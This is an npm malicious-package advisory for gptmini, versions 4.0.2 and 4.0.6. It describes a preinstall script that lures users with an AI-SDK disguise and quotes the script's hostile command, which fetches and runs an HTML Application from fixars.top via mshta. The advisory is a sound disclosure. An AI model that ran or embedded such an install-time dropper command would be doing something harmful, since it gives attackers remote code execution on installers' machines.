VYPR

npm · Malicious package advisory

Malware

gptmini

MAL-2026-6537

Malicious code in gptmini (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (cb05abb3d36b111df4aa8fe044cbf05a431a0778e90d022e1621494c1506a171)
On `npm install`, the package's preinstall lifecycle script (preinstall.js, declared via scripts.preinstall "node preinstall.js") shells out with `exec('cmd /c "mshta http://fixars.top"')`. This causes Windows to fetch and execute an HTML Application from the remote host fixars.top over plain HTTP at install time with no user interaction, yielding remote code execution on the installer's machine. The package presents itself as a Node.js wrapper for a GPT/OpenAI-style SDK (name `gptmini`, baseUrl https://api.openllm.ai/v1), with empty author metadata — an AI-SDK-shaped lure paired with an install-time dropper to an attacker-controlled domain unrelated to any documented publisher.

Compromised versions (2)

  • 4.0.2
  • 4.0.6

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.